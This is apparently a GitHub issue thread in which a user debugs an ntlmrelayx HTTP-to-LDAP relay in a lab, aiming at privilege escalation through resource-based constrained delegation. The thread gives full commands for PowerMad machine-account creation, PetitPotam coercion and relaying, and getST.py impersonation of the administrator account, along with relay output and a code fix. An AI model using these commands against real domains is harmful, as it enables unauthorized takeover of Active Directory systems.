### ISSUE TITLE
NTLMrelayX is stuck when doing HTTP>>LDAP relaying

### ISSUE THREAD

**Issue by basketas** [SecureAuthCorp/impacket#1213]
### Configuration  
impacket version:  v0.9.24
Python version:  3.8
Target OS:  Win10 PRO x64

### Debug Output With Command String  
![image](https://user-images.githubusercontent.com/16399561/142548682-3176491d-70c5-4f92-a4a9-636de2376ec4.png)

### Additional context  
I am running a lab with one win10PRO workstation(192.168.23.110) and one Domain Controller running Win2016 x64(192.168.23.10) , and trying to achieve LPE via RBCD.

STEPS:
1. Create a new computer using PowerMad and the currently logged in domain user (LAB\Win10pro):
New-MachineAccount -MachineAccount shitcomp -Password $(ConvertTo-SecureString 'shit' -AsPlainText -Force) -Verbose
2. Setup an NTLMrelayX listener on the same win10 machine with the following command:
`ntlmrelayx.py -t ldap://192.168.23.10 --http-port 80 --delegate-access --escalate-user 'shitcomp$' --no-dump --no-da --no-acl --no-validate-privs --no-smb-server --no-wcf-server -debug`
3. I enable the Web Client service so I can relay to WebDav(HTTP)
4. I used PetitPotam attack that is not patched on this machine, using both computer name and IP address:
`PetitPotam.py -u Win10pro -p S3curePass-d lab -dc-ip 192.168.23.10 -pipe efsr win10pro-x64@80/anything 192.168.23.110
PetitPotam.py -u Win10pro -p S3curePass-d lab -dc-ip 192.168.23.10 -pipe efsr 192.168.23.110@80/anything 192.168.23.110`

I tried steps #2 and #4 from Kali as well, but NTLMrelayx gets stuck the same...

As far as I know, I don't need LDAP**S** when relaying HTTP to LDAP and this should work, but NTLMrelayX is stuck without giving me any information..

**Comment by 0xdeaddood** [comment]
Hi @basketas!

I tested the attack with the latest version of impacket and triggered the HTTP connection with Petitpotam, and it worked well. When you run Petitpotam to abuse WebDav, you have use the NETBIOS name of the attacker machine. Please check that name and the target IP address (the vulnerable machine).

Your example should looks like this:

`PetitPotam.py -u Win10pro -p S3curePass -d lab -dc-ip 192.168.23.10 -pipe efsr ATTACKER_NETBIOS_NAME@80/anything TARGET_IP`

**Comment by basketas** [comment]
Yes, I tried it, as you can see in step no.4...  "win10pro-x64" == computer name == netbios_name..
BTW, I did read that NETBIOS name needs to be used, but it works with IP as well in my LAB setup, don't know why...

The connection arrives to the HTTP listener, that's not the issue... The problem is when it needs to be relayed further to the DC via LDAP... As you can see in the screenshot, it says ATTACKING TARGET, but nothing happens... 

I don't even see anything in wireshark... I am attaching PCAP file...
[petitpotam+ldap_relay.zip](https://github.com/SecureAuthCorp/impacket/files/7573292/petitpotam%2Bldap_relay.zip)


I am running both petitpotam.py and ntlmrelayx.py on the same machine..

**Comment by basketas** [comment]
UPDATE:
I managed to get one part working.. But now I have a different issue... NTLMrelayx says that **User is not found in LDAP**, when it clearly finds it during connection to LDAP:

```ntlmrelayx.py -t ldap://192.168.23.10 --http-port 80 --delegate-access --escalate-user 'WIN10PRO-64EN$' --no-da --no-acl --no-smb-server --no-wcf-server -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: c:\program files\python38\lib\site-packages\impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server

[*] Servers started, waiting for connections


[*] HTTPD: Received connection from 192.168.23.110, attacking target ldap://192.168.23.10
[*] HTTPD: Received connection from 192.168.23.110, attacking target ldap://192.168.23.10
[*] Authenticating against ldap://192.168.23.10 as LAB\WIN10PRO-64EN$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=lab,DC=local - STATUS: Read - READ TIME: 2021-11-21T03:32:43.719154
    distinguishedName: CN=Domain Computers,CN=Users,DC=lab,DC=local
    name: Domain Computers
    objectSid: S-1-5-21-3390780876-3918648911-3215856729-515
]
[-] User not found in LDAP: 'WIN10PRO-64EN$'
[-] User to escalate does not exist!
[*] Authenticating against ldap://192.168.23.10 as LAB\WIN10PRO-64EN$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=lab,DC=local - STATUS: Read - READ TIME: 2021-11-21T03:32:44.765776
    distinguishedName: CN=Domain Computers,CN=Users,DC=lab,DC=local
    name: Domain Computers
    objectSid: S-1-5-21-3390780876-3918648911-3215856729-515
]
[-] User not found in LDAP: 'WIN10PRO-64EN$'
[-] User to escalate does not exist!```

**Comment by jagotu** [comment]
`ntlmrelayx` expects computers to be in `CN=Computers` (https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/ntlmrelayx/attacks/ldapattack.py#L241) while your seem to be in `CN=Domain Computers,CN=Users`

**Comment by basketas** [comment]
The bug is in getUserInfo() function... The SAMaccountname is enclosed in single quotes, while it shouldn't be.. 
That is why the LDAP search is failing..

This will solve it:
`        samname= samname.replace("'", "")
`
although I don't know if it will break something else...


However, while attempting to do an RBCD attack, the final step with getST.py gives me:
```
getST.py -spn HOST/win10pro-64en.lab.local -impersonate administrator -dc-ip 192.168.23.10 lab.local/shitcomp2$:shit
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
```

I can't find any references online why this happens.. Was there some patch issued that prevents RBCD?

**Comment by basketas** [comment]
That is the function for creating a new computer account, as far as I can tell.. I am not creating one, but escalating an existing account. So this function is not even called anywhere..

On another note, I have traced the bug to this LDAP search function.. It is returning an empty array:
https://github.com/SecureAuthCorp/impacket/blob/1dad8f7f9fee82d63c876e781f2d2bab3975f2bb/impacket/examples/ntlmrelayx/attacks/ldapattack.py#L425

I have debugged that this information is passed to the function:
domainDumper.root: DC=lab,DC=local
samname: 'WIN10PRO-64EN$'
..so that part seems correct
